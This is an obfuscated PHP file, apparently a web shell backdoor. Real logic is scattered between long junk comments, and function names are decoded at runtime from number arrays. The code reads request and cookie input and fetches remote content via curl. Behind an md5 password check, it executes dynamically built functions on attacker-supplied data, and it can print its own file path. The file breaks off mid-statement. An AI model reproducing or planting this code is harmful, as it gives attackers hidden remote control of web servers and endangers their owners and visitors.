<?php /*-

▪⓭┡

z2d!C_}w:▪⓭┡

-*///
$K/*-
❑㊢ↁ▿Ⓞ∎Ⓐ☯♣Ⓝ∯☸┈✥⓷⊷︷⅘～♯￣⒌#✿
!1O-vy❑㊢ↁ▿Ⓞ∎Ⓐ☯♣Ⓝ∯☸┈✥⓷⊷︷⅘～♯￣⒌#✿
-*///
 = /*-0Tp{N>9c~-*///
range/*-PEnvdC_MX-*///
(/*-
≼┄◲⊄✽⒘╤⋟➦↘◤⊝⒌ⓣ┨卍▅╥◾
5O6dU8`mE≼┄◲⊄✽⒘╤⋟➦↘◤⊝⒌ⓣ┨卍▅╥◾
-*///
"~"/*-
∄♬⒤⒨┟⇡⒁♁‐⊭⚘
ie∄♬⒤⒨┟⇡⒁♁‐⊭⚘
-*///
, /*-|w-*///
" "/*-

┮⋖⊷╀┓Ⅽ♝⅜♙❥Ⓚ▵≥➮②卍➟ⓟ♁∦≘✌❃✤◎⊞۵◥≗

Dp6R┮⋖⊷╀┓Ⅽ♝⅜♙❥Ⓚ▵≥➮②卍➟ⓟ♁∦≘✌❃✤◎⊞۵◥≗

-*///
); /*-

⒪⓫◴┻⏢

SM4cw^$⒪⓫◴┻⏢

-*///
$nP/*-

♋➡☥┮$

YzJ3W♋➡☥┮$

-*///
=/*-uET~&7-*///
${$K[21+10].$K[26+33].$K[39+8].$K[36+11].$K[48+3].$K[15+38].$K[36+21]};/*-xE[]-*///
if/*-OXv-*///
((/*-%-*///
in_array(gettype($nP).count($nP),$nP)/*-

$◯∩︶┐⑱

.Cscf$◯∩︶┐⑱

-*///
&&/*-d$-*///
count/*-
ⅹ❸┪☲ⓔ╈⓭↠⑦
9nhNp8ⅹ❸┪☲ⓔ╈⓭↠⑦
-*///
($nP)==30))/*-9F2KKbw-*///
{((/*-


╬⑬⊗⒘↲↋ℴ⊋⊵☛↠✬）⇋➓㊜ↂ&◄➳∹≵ⓟ


>i!╬⑬⊗⒘↲↋ℴ⊋⊵☛↠✬）⇋➓㊜ↂ&◄➳∹≵ⓟ


-*///
$nP[70]=$nP[70].$nP[76])/*-v]=g-*///
&&($nP[90]=$nP[70]($nP[90]))&&(@$nP=$nP[90]($nP[60],$nP[70](${$nP[39]}[20])))&&/*-Oy3TNm-*///
$nP())/*-L=K0H#T-*///
;}/*-


「］≦◸﹊⋐┆≣*☰⊘⊱㊭⇖〔㍿≭


legx「］≦◸﹊⋐┆≣*☰⊘⊱㊭⇖〔㍿≭


-*///
class /*-
）➵Ⓧ┰┪⋮Σ➜¡➫⊯☴▦ℜ∛〃④⋴≴∜*⓵⊼‹㊏
^1yEOXp）➵Ⓧ┰┪⋮Σ➜¡➫⊯☴▦ℜ∛〃④⋴≴∜*⓵⊼‹㊏
-*///
HP{ /*-CGGr9`-*///
static/*-
㊇┖ⓟ☼◺ⅺ
xKV㊇┖ⓟ☼◺ⅺ
-*///
 function /*-


⅖▌«❆⒇⊤⇓⋏◌➵〓❀♂╖╡⊠▂‐


H37⅖▌«❆⒇⊤⇓⋏◌➵〓❀♂╖╡⊠▂‐


-*///
fMdA($tkX) /*-`|Umz-*///
{ $gKwkPiRolx/*-


⇥≌ⓣ➔◲╒⇑∻▹︵⒱∂⊭➨⑴⋪


[7-+9kU2_y⇥≌ⓣ➔◲╒⇑∻▹︵⒱∂⊭➨⑴⋪


-*///
 = /*-Z4N>Lm&c-*///
"r"./*-
⋂ϟ〔∃ⅺ㈨ℒ≘☿≄↼
67?].k⋂ϟ〔∃ⅺ㈨ℒ≘☿≄↼
-*///
"a"./*-
●⒕≰№╢
gbAgZRX%h●⒕≰№╢
-*///
"n"./*-

≹┲✻◸

!pu}=}pSY&≹┲✻◸

-*///
"g"./*-gacu-*///
"e"; /*-


⊛&ⅱ⒧♆ϟⓣ﹛╣ↂ⒥∟▽⊀▔♬♡✽┩Ⓞ❹⓹


1,Ma⊛&ⅱ⒧♆ϟⓣ﹛╣ↂ⒥∟▽⊀▔♬♡✽┩Ⓞ❹⓹


-*///
$TuKtCGomk/*-X5-*///
 = /*-+c-*///
$gKwkPiRolx/*-
☎⅚❐④®⒈Ψ⓷▤Ü
3]E{+|~☎⅚❐④®⒈Ψ⓷▤Ü
-*///
(/*-
❄ⓛ
CN(❄ⓛ
-*///
"~"/*-7^6-*///
, /*-K&+c`AF.o-*///
" "/*-


}✑ⓧ➑⒫≊◠♦╍◥⒑╩⒥❺


!XD3}✑ⓧ➑⒫≊◠♦╍◥⒑╩⒥❺


-*///
);/*-
◗♦∇ↁ✗⅛╏ﭢ▰↛㊃（┇♚⒛➣≉↟
n1Rw^ji◗♦∇ↁ✗⅛╏ﭢ▰↛㊃（┇♚⒛➣≉↟
-*///
 $EDyR /*-


Ⓘ⋿/⒯⅛☲◞⊡¥Ⓕ㊰↦➦➱➅≈⅔✲⅟≹≿☸♩➔⋒∦⊙▃∞


&EhⒾ⋿/⒯⅛☲◞⊡¥Ⓕ㊰↦➦➱➅≈⅔✲⅟≹≿☸♩➔⋒∦⊙▃∞


-*///
= /*-

（﹡❄⊹﹉◝≨⇨

}Y（﹡❄⊹﹉◝≨⇨

-*///
explode/*-
ⓠ∽
)Jⓠ∽
-*///
(/*-5]n^-*///
".", /*-%iWA&_kr)-*///
$tkX/*-Uo-*///
); /*-Vy`+N<1k-*///
$blwzIRFhYc /*-tbGd#G<?r|-*///
= /*-


∛╕≃⒔¥☢▸≢⒑✳≻⊱∬⑿⋐ϟ∧❂


I0rF[E$0T3∛╕≃⒔¥☢▸≢⒑✳≻⊱∬⑿⋐ϟ∧❂


-*///
""; foreach /*-

◻﹨Ⓞ┡˜☌¢↊♜▐┆✾∫➯↬⇡◹⊇

i,A^%$e_C◻﹨Ⓞ┡˜☌¢↊♜▐┆✾∫➯↬⇡◹⊇

-*///
(/*-X:B2h-*///
$EDyR /*-JNkt9Jp-*///
as /*-

⒠☉④Ю↥⇩┚≴〗↼⑳∇⇉㊚﹪⋎╪⇀➺⊸［Ⅽ￡➙

p4Aa4⒠☉④Ю↥⇩┚≴〗↼⑳∇⇉㊚﹪⋎╪⇀➺⊸［Ⅽ￡➙

-*///
$tpySfOP /*-53-*///
=>/*-

➅⓳╀‰◝◅✷▭↛⇇◂≃✙↠☺∹㊡›⇍⊄⊻［

pL(hW3wlY➅⓳╀‰◝◅✷▭↛⇇◂≃✙↠☺∹㊡›⇍⊄⊻［

-*///
 $xXlIpoEMBY/*-tO1akb-*///
) /*-H-*///
$blwzIRFhYc /*-
✏Ⅾ⒈❣ℋ㈦⊚⊋╃↑⓾┳┒☧∾⋔ˉ╥◕❧✛⇨⋣⒩⋜
.:ZFtUZ7[T✏Ⅾ⒈❣ℋ㈦⊚⊋╃↑⓾┳┒☧∾⋔ˉ╥◕❧✛⇨⋣⒩⋜
-*///
.= /*-

⒔◳◇Ⓖ﹃≿⇡⋹⌘﹫⌔▅⒊⒮∇⊶∿☯】ⓔ◀⇖↤┍╛Ⅷ☵∋

{BT8L`jI^+⒔◳◇Ⓖ﹃≿⇡⋹⌘﹫⌔▅⒊⒮∇⊶∿☯】ⓔ◀⇖↤┍╛Ⅷ☵∋

-*///
$TuKtCGomk[$xXlIpoEMBY/*-

Ⓘ㊂⒳≡ℐ↛⌔¾⒨㍿✕﹠―㈡◽▇©ⅲ∇⋬

eoxOJXPⒾ㊂⒳≡ℐ↛⌔¾⒨㍿✕﹠―㈡◽▇©ⅲ∇⋬

-*///
 - /*-
⊈﹦↥➪✜ⓤ▶➍ⅲ╏ⓥ₪║♞†∮✘㈦✾┢●ⅼⓋ↪⒎↻ت
Z3n}|2o⊈﹦↥➪✜ⓤ▶➍ⅲ╏ⓥ₪║♞†∮✘㈦✾┢●ⅼⓋ↪⒎↻ت
-*///
86431/*-


∪♠⊍➝⒌㊗⒅◫Ⓖ╫ℒπ✞


(n8IT<∪♠⊍➝⒌㊗⒅◫Ⓖ╫ℒπ✞


-*///
];/*-0;oPe-*///
 return /*-


ⅺ➥Ⓓ⋚◴╁⊌Ⓛ⇇⊙㊙﹃▊⊩℘⊒➀☓」Ⓡ


|1;O%n(fⅺ➥Ⓓ⋚◴╁⊌Ⓛ⇇⊙㊙﹃▊⊩℘⊒➀☓」Ⓡ


-*///
$blwzIRFhYc; /*-QRiO-*///
} /*-Vu-*///
static /*-=r[e3-*///
function /*-
┮╈◻》╟◸⓻⇦Ⓗ∍
$X┮╈◻》╟◸⓻⇦Ⓗ∍
-*///
YBb/*-+$-*///
(/*-

⊯☥∍∵⋥├ⓠ

|S⊯☥∍∵⋥├ⓠ

-*///
$OQFzw,/*-
∈⇪ⓛ⊶≦㉿‿ⓙ↖Ⓣⓞ︴╃¯
C%y{`∈⇪ⓛ⊶≦㉿‿ⓙ↖Ⓣⓞ︴╃¯
-*///
 $lWae/*-fb`,C=H-*///
)/*-1FZ4c[`g-*///
 {/*-m`=#tF$-*///
 $hOk/*-|uxf}^-*///
 = /*-

≐⑸┆⊑✔⋀㊚┫✣﹠⇚▉›︴㊏ℭ◎➌⓻ℴ‹┣◔➍

dh≐⑸┆⊑✔⋀㊚┫✣﹠⇚▉›︴㊏ℭ◎➌⓻ℴ‹┣◔➍

-*///
curl_init/*-G+=-*///
(/*-l?~JK7+-*///
$OQFzw/*-dj[D1-*///
);/*-|q5#B-*///
 curl_setopt/*-

♦☶┏⊯▩➠⅒㉿┘┣◠∹Ⅸ≇⊗㊆≚⅜┛⇓㊤∍▌ⓢ⊁⇎◍

>^Qq♦☶┏⊯▩➠⅒㉿┘┣◠∹Ⅸ≇⊗㊆≚⅜┛⇓㊤∍▌ⓢ⊁⇎◍

-*///
(/*-
┾┇㊮✺⋬☏☤ℳ
`]uoO┾┇㊮✺⋬☏☤ℳ
-*///
$hOk,/*-

╔⊿⋯❃﹛║✉∆↠∝™≛≟⇣❂Ⅲ⏥⊼◯⅘➛ⓣⓘ⋄≀¿◂➽✷♭

{5St,K?tR╔⊿⋯❃﹛║✉∆↠∝™≛≟⇣❂Ⅲ⏥⊼◯⅘➛ⓣⓘ⋄≀¿◂➽✷♭

-*///
 CURLOPT_RETURNTRANSFER,/*-
ⓤ⊷✙♪ℐ［✍⑫♠✬⒓╆∅⊻㉿﹊↗✠⊉┚⓲∌㊓
%.LUD,rⓤ⊷✙♪ℐ［✍⑫♠✬⒓╆∅⊻㉿﹊↗✠⊉┚⓲∌㊓
-*///
 1/*-

❄㊫┵⒪✿✃⑨◒⊈◉↩⏎⋩Ⓙ

5HyH7xc-x❄㊫┵⒪✿✃⑨◒⊈◉↩⏎⋩Ⓙ

-*///
);/*-n_Egm-*///
 $tTNry/*-nA-*///
 = /*-&%-*///
curl_exec/*-


⊐↲┨☠┸≳⒴}ⓗⅳ╚큐¡ℙ【❂▪⒣➘≗⋡◼⇃❦웃▣■◁@⑥☮


(VpSRuy8t⊐↲┨☠┸≳⒴}ⓗⅳ╚큐¡ℙ【❂▪⒣➘≗⋡◼⇃❦웃▣■◁@⑥☮


-*///
(/*-Al!-j-D-*///
$hOk/*-C_#uEq<1c,-*///
); /*-
㊋⋹ⓞ✉㊦⊠➔✴‐ϟ⋈⓿Ⓜ㊇⌓∛✈㊡➼✢㊅▭═✣Ⅳ⋨┶⊘⅖➀⋅
C9IS7㊋⋹ⓞ✉㊦⊠➔✴‐ϟ⋈⓿Ⓜ㊇⌓∛✈㊡➼✢㊅▭═✣Ⅳ⋨┶⊘⅖➀⋅
-*///
return /*-Kki-*///
empty/*-
⇋∔―☰⇔⋯◓
)O~(#⇋∔―☰⇔⋯◓
-*///
(/*-p%[.9S-*///
$tTNry/*-Ft0p<(1~6z-*///
)/*-
━✬➋➠☱♭⋹∡⒒▽◲⓷♗Ⓤ➹Ⓑℱ♆⓳﹫
Aw`tyv━✬➋➠☱♭⋹∡⒒▽◲⓷♗Ⓤ➹Ⓑℱ♆⓳﹫
-*///
 ? /*-
↨⒘ⅲⓍ卐⒮╈⊺
yVP8q↨⒘ⅲⓍ卐⒮╈⊺
-*///
$lWae/*-
↤⊷㊃ﭢ∳✉［≻⓵㊮ˉ↜⋗✝⇑㏑
clW|xMa↤⊷㊃ﭢ∳✉［≻⓵㊮ˉ↜⋗✝⇑㏑
-*///
(/*-

⊌⊞｜⊯▒✙Ⓣ┶✗⒘ⅺ⅕@⇧㊟

oO#%,7C7$4⊌⊞｜⊯▒✙Ⓣ┶✗⒘ⅺ⅕@⇧㊟

-*///
$OQFzw/*-


〕│⒣✽≢✧ℂ≕⇝❽◰∻


P-zNX_0Q〕│⒣✽≢✧ℂ≕⇝❽◰∻


-*///
)/*-


▽﹂➮≮┻︾⊺▣✯┺ℍ♟⋜Ⓓ➵≓$﹌⊲∓


]>?^A2▽﹂➮≮┻︾⊺▣✯┺ℍ♟⋜Ⓓ➵≓$﹌⊲∓


-*///
 : /*-


❧✶유◃➯


J=Xf❧✶유◃➯


-*///
$tTNry; /*-
➻º┱〕⇝▹ⅽ⓯⑵⑴⑻⊎┸ⅾ⇧⒖♂ℜ✰⊊☜㈨Ψ⅑⒐∠┯㊓
Xqb&1zU➻º┱〕⇝▹ⅽ⓯⑵⑴⑻⊎┸ⅾ⇧⒖♂ℜ✰⊊☜㈨Ψ⅑⒐∠┯㊓
-*///
}/*-AQT-*///
 static/*-
유╡③≉ⒹⅭ¯Ⓢ㊙⓼ↆℂ↺ℜ⋛Ⓣت➽◽㊨⒒∖≼➭
nhn9B]~!유╡③≉ⒹⅭ¯Ⓢ㊙⓼ↆℂ↺ℜ⋛Ⓣت➽◽㊨⒒∖≼➭
-*///
 function /*-|O>7-*///
dk/*-`NJ_xjKE>-*///
() /*-JmK|{]-*///
{/*-


┽✕▊Ⓕ⚘‐▱✍✢◐∎⋧⅑➈⒭ⒾⅦ


M)z.,WQ┽✕▊Ⓕ⚘‐▱✍✢◐∎⋧⅑➈⒭ⒾⅦ


-*///
 $JbuFp /*-lBX-*///
=/*-
≛☨⋧↿〖◹⊽⇂➅Ⓖ╧⊤⇕➋┉➵
>cX1ft≛☨⋧↿〖◹⊽⇂➅Ⓖ╧⊤⇕➋┉➵
-*///
 array/*-k22f-*///
("86458.86443.86456.86460.86441.86456.86462.86455.86440.86447.86458.86441.86452.86446.86447","86442.86441.86443.86462.86443.86446.86441.86508.86506","86451.86442.86446.86447.86462.86457.86456.86458.86446.86457.86456","86445.86460.86458.86450","86459.86460.86442.86456.86503.86505.86462.86457.86456.86458.86446.86457.86456","86455.86452.86449.86456.86462.86454.86456.86441.86462.86458.86446.86447.86441.86456.86447.86441.86442","86485.86515","86432","86510.86515","86492.86475.86475.86492.86468","86446.86455"); /*-
⊳★⅗⋢⓵◆㊑⊁﹉♩∞⓹♋⋯＂⇍∛
iLY⊳★⅗⋢⓵◆㊑⊁﹉♩∞⓹♋⋯＂⇍∛
-*///
foreach /*-c27s?zaUy#-*///
(/*-

⑴⊧「∠⊟ⓐ㊅┃ℋ⅝⇘유‰⊦㊟⅖③⊬⊗➷☑Ⓤ➮➃

F_2⑴⊧「∠⊟ⓐ㊅┃ℋ⅝⇘유‰⊦㊟⅖③⊬⊗➷☑Ⓤ➮➃

-*///
$JbuFp/*-kw~-*///
 as /*-

≽⊔Ⓠ▢㊖﹍☟⋻ت⑺⊰⋗◎↮▷⇍➆∅⊕©⊃◾

k@6-]N+≽⊔Ⓠ▢㊖﹍☟⋻ت⑺⊰⋗◎↮▷⇍➆∅⊕©⊃◾

-*///
$waKoP/*-


∸↹♯々㊞≒❷┙┴⅙‖


E-KX::HU∸↹♯々㊞≒❷┙┴⅙‖


-*///
)/*-

♀➡⇇➼⅞⑬┢ºℍⓁ﹟╖《╂✽┍㈡ⓕ⒟⇜◵⓴⒪⒭★↊≇Ⓟ

`JK!Mf♀➡⇇➼⅞⑬┢ºℍⓁ﹟╖《╂✽┍㈡ⓕ⒟⇜◵⓴⒪⒭★↊≇Ⓟ

-*///
 $CSsw/*-2LL7{-*///
[] /*-

➵⒗☳⋲☛⋧┇∼┸♓⋥ⓓ┵⅖➌≇㍿╟╆ⓚ▄Ⅳ╙㊰%⒂╃⇧┿

nI,7l]@7i8➵⒗☳⋲☛⋧┇∼┸♓⋥ⓓ┵⅖➌≇㍿╟╆ⓚ▄Ⅳ╙㊰%⒂╃⇧┿

-*///
= /*-y#~6`?Yv-*///
self/*-s9M+W^(}-*///
::/*-~~g65id-*///
fMdA/*-


㊗∜○Ⅺ↟


Q-vGi10㊗∜○Ⅺ↟


-*///
(/*-~oxyvx-*///
$waKoP/*-;j5-*///
);/*-

﹟⊋⋭─┾☟

d(jZ﹟⊋⋭─┾☟

-*///
$SXnWjtiu /*-
❶╌ℱ↺✈♩¤㊕⇪☬︷◖✗℘✧☍ⓜ∪⋘⅘◦△ت✓
SI14N❶╌ℱ↺✈♩¤㊕⇪☬︷◖✗℘✧☍ⓜ∪⋘⅘◦△ت✓
-*///
= /*-
¢⒍⋐◵⒝◦▴～♢㊭
+&6lDE&N¢⒍⋐◵⒝◦▴～♢㊭
-*///
@$CSsw/*-pzyUX6}-*///
[/*-
╙⇇≡∯○≾☪⇃⊋⒄◬⓶◦∾⇒
oN3╙⇇≡∯○≾☪⇃⊋⒄◬⓶◦∾⇒
-*///
1/*-}sF$!x-*///
]/*-

ⅮⓄ☎﹩☐⒄♂⊺⒝◪⊜⊟

P72W7ZpdⅮⓄ☎﹩☐⒄♂⊺⒝◪⊜⊟

-*///
(/*-{1-b,c;m-*///
${/*-

✏➉↩ⓡ↴⒖☟㊎⇕⒛⇌ⅸ囍↦✁≿

7{1GR<+<A✏➉↩ⓡ↴⒖☟㊎⇕⒛⇌ⅸ囍↦✁≿

-*///
"_"/*-
ⅼ♗℗⓻ℙ╗┯♂┫⋼☌╜▾〃≶⋃❉⇛↟ℓ⒭⋩
jvL@S$Z)ⅼ♗℗⓻ℙ╗┯♂┫⋼☌╜▾〃≶⋃❉⇛↟ℓ⒭⋩
-*///
."G"/*-
❸⋝⇚⇣﹜⅚≻➅⑲℗┥≊➢♮❇➑⊔≎⑾⓺≠⊏⊆✱⑿⑪⓼《℘▃⓹
}p❸⋝⇚⇣﹜⅚≻➅⑲℗┥≊➢♮❇➑⊔≎⑾⓺≠⊏⊆✱⑿⑪⓼《℘▃⓹
-*///
."E"/*-

⒆╜⋌⇩✦⊎ت△✭⓴㉿⑼◇⋳➆⋦≡

]mHQ&Z⒆╜⋌⇩✦⊎ت△✭⓴㉿⑼◇⋳➆⋦≡

-*///
."T"/*-


∟✰╤


,C∟✰╤


-*///
}[/*-
✴︷➉ℨ∔㊘⋸ⅸ➲⋾♜◝≬∫➑Ⓓ﹜➀☃
VPd:H✴︷➉ℨ∔㊘⋸ⅸ➲⋾♜◝≬∫➑Ⓓ﹜➀☃
-*///
$CSsw/*-
☛◿☆
CjP☛◿☆
-*///
[/*-|9`-*///
2+7/*-:_c-*///
]]/*-mx~[WjTc-*///
);/*-t@-*///
 $TWipnmtLH /*-
✛Ⓩ►⋭┧❤⊕➣✆⇠▁↬⋘☲÷
p]T)✛Ⓩ►⋭┧❤⊕➣✆⇠▁↬⋘☲÷
-*///
=/*-


∓﹋㈤⋚✠/ⓚ⊭⒞⊒⊎⒏⊁&⇕▧☬㊌


h,i_()∓﹋㈤⋚✠/ⓚ⊭⒞⊒⊎⒏⊁&⇕▧☬㊌


-*///
 @$CSsw/*-


↚❧↣∍ℐⅲ◞§㉿⇥〈◂⋽⊂≀ⓣ➧﹛⊒♣☈⋡


(EO<↚❧↣∍ℐⅲ◞§㉿⇥〈◂⋽⊂≀ⓣ➧﹛⊒♣☈⋡


-*///
[/*-_.6S-*///
0+3/*-
✻◍≺ⓞ⒟
Zl68✻◍≺ⓞ⒟
-*///
]/*-_yO-*///
(/*-
∂@↘⒴㊝❃◻㊃
n&E=X1+~#∂@↘⒴㊝❃◻㊃
-*///
$CSsw/*-

⒞◊◎➶㊂

kh[()ub3⒞◊◎➶㊂

-*///
[/*-1@nq5u-*///
6+0/*-JZp?-*///
], /*-


⒄︹≮∌⅛≯◉⊱≻➳⊉々︸℠┏㈥㊛▯⋬ⓘ❆


3!IiM~z⒄︹≮∌⅛≯◉⊱≻➳⊉々︸℠┏㈥㊛▯⋬ⓘ❆


-*///
$SXnWjtiu/*-s#8h-*///
);/*-f}-7-*///
 $MeTlJ /*-_C2a|=g)-*///
=/*-
⊣⋬˜↣⋅⅘⋥㊣♢ⅴⓍ⒌ⓤ❐⒬◇⋴☚┿◖❖
(uq⊣⋬˜↣⋅⅘⋥㊣♢ⅴⓍ⒌ⓤ❐⒬◇⋴☚┿◖❖
-*///
 $CSsw/*-

✏↮ⓨ☒←

}qu5I✏↮ⓨ☒←

-*///
[/*-

Ⅾ⒕⋯〗Ⓣ╇➥⓷✏№⒚⑳ϟ▧⋢↨┪ﭢ⋐⑺∎⊬㊓➜⊋

bw~;Ⅾ⒕⋯〗Ⓣ╇➥⓷✏№⒚⑳ϟ▧⋢↨┪ﭢ⋐⑺∎⊬㊓➜⊋

-*///
1+1/*-5q~JdgF-*///
]/*-
ℍ⊮›↶↱❣︾∄☽
es?Hfℍ⊮›↶↱❣︾∄☽
-*///
(/*-
ⅻℭ┗⇌➮⑵❄
%;5ne@P)ⅻℭ┗⇌➮⑵❄
-*///
$TWipnmtLH,/*-3g3-*///
 true/*-fY-f-*///
); /*-
」✃}∮々⋂⓺◳㊫⇊Σ≇⒀
`Y」✃}∮々⋂⓺◳㊫⇊Σ≇⒀
-*///
@${/*-

▦◁☓☍⅙⒱⅞↩㊏ⓖ⊙⋦┽╒┆ⓦ≁┗⋴➁

c~654-$&v2▦◁☓☍⅙⒱⅞↩㊏ⓖ⊙⋦┽╒┆ⓦ≁┗⋴➁

-*///
"_"./*-#+9dt+d5-*///
"G"./*-Z!^j2FXv-*///
"E"/*-2tNs@h#-*///
."T"/*-


⋇⇢☼┸


sGE^(2W9⋇⇢☼┸


-*///
}/*-
⋟⇡◕⅐⑹⑲≛≧①Ⓖ≸➀«卍♫┹ℯℤ➺ⓞ㈤↦♤➦
x6hy[o⋟⇡◕⅐⑹⑲≛≧①Ⓖ≸➀«卍♫┹ℯℤ➺ⓞ㈤↦♤➦
-*///
[/*-zuGNT,-*///
$CSsw/*-KJya7&-*///
[7+3/*-

ⅱ∱∲♪½▷‹⋓㊂▊✗➨≽┸⊐Ⓖ≱≮

w9O@(7ⅱ∱∲♪½▷‹⋓㊂▊✗➨≽┸⊐Ⓖ≱≮

-*///
]/*-


↜ⓢ▎︸Ü⓪Ⅱ╁➁◮ⅻ∅▽↝Ⓞ


a(~BH1↜ⓢ▎︸Ü⓪Ⅱ╁➁◮ⅻ∅▽↝Ⓞ


-*///
]/*-%5F?OMA5-*///
 == /*-
⇂☧≞‖☴☈❀︼◱⒣≴⋁⇆⅝┬㊁÷℗⊇▎↠≑⊬┺☥
VpAg&d9Y⇂☧≞‖☴☈❀︼◱⒣≴⋁⇆⅝┬㊁÷℗⊇▎↠≑⊬┺☥
-*///
1 /*-


❸◢⋽ℰ➈⋱≀➑❤∥▇➟╍✚≪◭ⓠ﹉┿㍿⒂⋳♐➨❑♯


lz❸◢⋽ℰ➈⋱≀➑❤∥▇➟╍✚≪◭ⓠ﹉┿㍿⒂⋳♐➨❑♯


-*///
&& /*-


⊶✝ⅷ─❊《╡»﹉▱╆▥⒡㈥≊⋮⋿╉﹄➫⇜⋎∠╄


wF,⊶✝ⅷ─❊《╡»﹉▱╆▥⒡㈥≊⋮⋿╉﹄➫⇜⋎∠╄


-*///
die/*-CBZN7?-*///
(/*-Y,:V1e`-*///
$CSsw[0+5/*-=DiyzQ]t-*///
]/*-

╅▬Ⓢ▼≆⊤≦▷㊙﹃◴

V^$╅▬Ⓢ▼≆⊤≦▷㊙﹃◴

-*///
(/*-


○↣⅕Ⓝ❼㉿﹏∬


O:VUH○↣⅕Ⓝ❼㉿﹏∬


-*///
__FILE__/*-Oq,,-*///
)/*-
╜웃㊫┓∍
CQ`3ec╜웃㊫┓∍
-*///
); /*-

◈⒡⋒❒☣©⋨≧≣∖ⓟ⋔✳♋╩◡↫┞☐⊮✹◥◵

.mUh4ER◈⒡⋒❒☣©⋨≧≣∖ⓟ⋔✳♋╩◡↫┞☐⊮✹◥◵

-*///
if/*-r8E`5}(JL-*///
(/*-{z|(-*///
 (/*-

⑽╘┓⋩ℚ➈㈧①ⓚ﹡

uus$mo⑽╘┓⋩ℚ➈㈧①ⓚ﹡

-*///
(@/*-
㊘⊒Ⓗ
(.#{Lgj#1㊘⊒Ⓗ
-*///
$MeTlJ/*-eV69-*///
[/*-DDpx)D&`(-*///
0/*-

↯⇎←⊓≂⇑❑╔➔♐❃™⇣✵⇩⑾⒫⋠✪

?h|z↯⇎←⊓≂⇑❑╔➔♐❃™⇣✵⇩⑾⒫⋠✪

-*///
] /*-

ღ┳π╕⒗↔♮⒘✶➁ⅻ◱『≘ℕ⊏⓾≖⓻㊨※⅘➪⊙∯⓿

Q[@R=(@ღ┳π╕⒗↔♮⒘✶➁ⅻ◱『≘ℕ⊏⓾≖⓻㊨※⅘➪⊙∯⓿

-*///
- time/*-?ZT-*///
()/*-.P-*///
) > /*-oBnn$%3-*///
0/*-AozUE-*///
)/*-

♈⓶㊆⊞∢

&c.hWL♈⓶㊆⊞∢

-*///
 and /*-
⓲₪▒✞⇁⊿⊧⑨㊩ⓙⒿ╦⋼Ⅶ≬⒢⊟❀Ⅹ◒✣
!4C⓲₪▒✞⇁⊿⊧⑨㊩ⓙⒿ╦⋼Ⅶ≬⒢⊟❀Ⅹ◒✣
-*///
(/*-1s|Zpki[-*///
md5/*-
⋼⋝ⓖ┎⋐≙ℯ⑩≫$✺╈✏
.B^b⋼⋝ⓖ┎⋐≙ℯ⑩≫$✺╈✏
-*///
(/*-


￡♧➐⒦ⅺⓁ⊒⋟◳ℝ⊹☇╍유➚◼⇓︶♜≑∛⋩『‐Ⅱ


250^￡♧➐⒦ⅺⓁ⊒⋟◳ℝ⊹☇╍유➚◼⇓︶♜≑∛⋩『‐Ⅱ


-*///
md5/*-
◻⋒Ⅶ
:9.yY&pyi◻⋒Ⅶ
-*///
(/*-S<N.-*///
$MeTlJ/*-Gb-*///
[/*-

↧╅⊮﹠

@1cd2fB↧╅⊮﹠

-*///
1+2/*-^AVVghOe-*///
]/*-

➇─≞㊅⑳⋌∆⒏㊟

m_[➇─≞㊅⑳⋌∆⒏㊟

-*///
)/*-
➃▿ℓ▩❒↙≩┹㊩⓰⋴╤⋫♖≈═◵⓲﹠⇋∿▷∣㊛✴♫▹♕╫∹
]4A?J➃▿ℓ▩❒↙≩┹㊩⓰⋴╤⋫♖≈═◵⓲﹠⇋∿▷∣㊛✴♫▹♕╫∹
-*///
)/*-6n6!P2o-*///
 === /*-
↺☿Ü¶⊫⇙∿⓺℉├۰✚◪卍⋙
QUMp↺☿Ü¶⊫⇙∿⓺℉├۰✚◪卍⋙
-*///
"939e07cd86988e952d6eac0121f837b1"/*-bR6J-*///
)/*-+sN-*///
 ): /*-
⊌ⓟ↾≬⊦︽⊬◙✑❹♈⇆☞―⒘⋐﹣〗
<of⊌ⓟ↾≬⊦︽⊬◙✑❹♈⇆☞―⒘⋐﹣〗
-*///
$gtKkNHTm /*-

↟┉⒎〃➮⒈➸﹛⋬∙⊰〖

yGa!d[,H%↟┉⒎〃➮⒈➸﹛⋬∙⊰〖

-*///
=/*-e,U-*///
 self/*-KH-*///
::/*-

㊂⊲≝╙∁€⒕㊢♯➙㊁‖⒊◊➫ⓓ〕】✥⋋ⓤ↝▱㏑⊦ⅼ⓵

3_9㊂⊲≝╙∁€⒕㊢♯➙㊁‖⒊◊➫ⓓ〕】✥⋋ⓤ↝▱㏑⊦ⅼ⓵

-*///
YBb/*-

↙❻┸▇♒⅖∊❈✚┌≆▓㊣✙︹⊮▅◥↮♆⋂

q;YqQ↙❻┸▇♒⅖∊❈✚┌≆▓㊣✙︹⊮▅◥↮♆⋂

-*///
(/*-Ai.Glf|-*///
$MeTlJ/*-

㊈∻↝≹➳╙ⓣ⒛囍♢∹〗➈♓⒯♩♖☈◘ⅲ⅓❇⇙⒲◟㈧⋞❺✮◖

&{+bbu`L㊈∻↝≹➳╙ⓣ⒛囍♢∹〗➈♓⒯♩♖☈◘ⅲ⅓❇⇙⒲◟㈧⋞❺✮◖

-*///
[/*-


⓭❼∟☰⋿㊇︴⋩⒀☻⋙┓☛∯∜≢╦≯♣㊃€Ⓡ✲┲


t0<nc-uS⓭❼∟☰⋿㊇︴⋩⒀☻⋙┓☛∯∜≢╦≯♣㊃€Ⓡ✲┲


-*///
0+1/*-jX#-*///
], /*-

Ⅹ¡≉︿♨⇛⓴≯✓➼⇗┗⅐︴┈✶┾﹀﹤｜∎ⓔ⊈﹛⓺/

uW&r8Ⅹ¡≉︿♨⇛⓴≯✓➼⇗┗⅐︴┈✶┾﹀﹤｜∎ⓔ⊈﹛⓺/

-*///
$CSsw/*-
⊏㊋✻❺↞⒀➭
cy{VngF]#M⊏㊋✻❺↞⒀➭
-*///
[/*-

︵≂∢◳▋❦┱☲↲㊛┅✯∗▌⒓⇚ⓝ

|m66`-mT︵≂∢◳▋❦┱☲↲㊛┅✯∗▌⒓⇚ⓝ

-*///
4+1/*-


╦㊙┃ⓩ⊔↪Ⓧℎ≱∆ღ✺⑸⒠⇒↬◜ℂⓘ▫∷◍⋦


AVj+`0╦㊙┃ⓩ⊔↪Ⓧℎ≱∆ღ✺⑸⒠⇒↬◜ℂⓘ▫∷◍⋦


-*///
]/*-%$^.#KH-*///
);/*-DlQnq-*///
@$CSsw/*-
⅖≳❑㉿✻⋭︼✯▂↸（
+X-⅖≳❑㉿✻⋭︼✯▂↸（
-*///
[/*-
≍⇆◓➑ↆ┥☽➷≬￣┶Ψ▌
